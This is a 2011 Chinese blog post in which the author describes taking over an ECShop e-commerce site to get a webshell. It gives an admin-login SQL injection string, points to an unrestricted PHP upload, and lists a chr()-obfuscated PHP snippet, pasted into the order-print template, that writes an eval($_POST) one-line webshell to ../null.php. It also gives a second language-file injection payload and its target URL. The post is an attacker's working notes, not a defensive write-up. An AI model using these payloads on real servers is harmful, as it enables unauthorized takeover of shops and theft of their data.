linux系統ecshop拿shell方法

Title:linux系統ecshop拿shell方法  --2011-06-08 13:23

最近弄一個站，對ECSHOP拿shell不瞭解，致使走了不少的彎路。

nginx/0.8.54的服務器,magic_quotes_gpc開啓轉義,不少的頁面被刪除了。

後臺有or漏洞，用戶"' or 1=1 #"密碼隨便填.

開始我也不知道，瞭解得少。

網站的myship.php訪問無果，可是庫項目管理模版能夠編輯，找不到文件路徑未果,由於用的是nginx/0.8.54，解析漏洞被修補。

不少拿shell的方法不能用，好比備份x.php.spl,FCK建立X.asp類文件夾。

開始在後臺轉了好久，一直沒有點Flash 播放器管理 上次PHP試試，後面沒有想到能夠上傳PHP的文件，沒有限制。

 

後面再上網找了下其餘的方法。

後臺-訂單管理-訂單打印-選擇源代碼編輯-保存
返回訂單列表，隨意選擇一個訂單打印，返回OK，生成一句話成功！
如下是編輯的代碼:

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

<?
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
$fp=@fopen($filen,$a);
$msg=@fwrite($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
?>

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

../null.php

<?php eval($_post[usb]);?>

這個是路徑和密碼。

我還有個想法就是'單引號沒有被轉義的時候,管理中心- 語言項編輯 編輯其中的PHP頁面,閉合單引號.

shopping_flow.php 編輯

輸入語言項關鍵字：  活動列表

活動列表';?><?php @eval($_POST[ok]);?><?'ok

保存

而後訪問

http://site/languages/zh_cn/shopping_flow.php

由於試的時候'被轉義不能閉合活動列表後面的單引號，因此沒成功。

誰有其餘方法，能夠一塊兒討論下。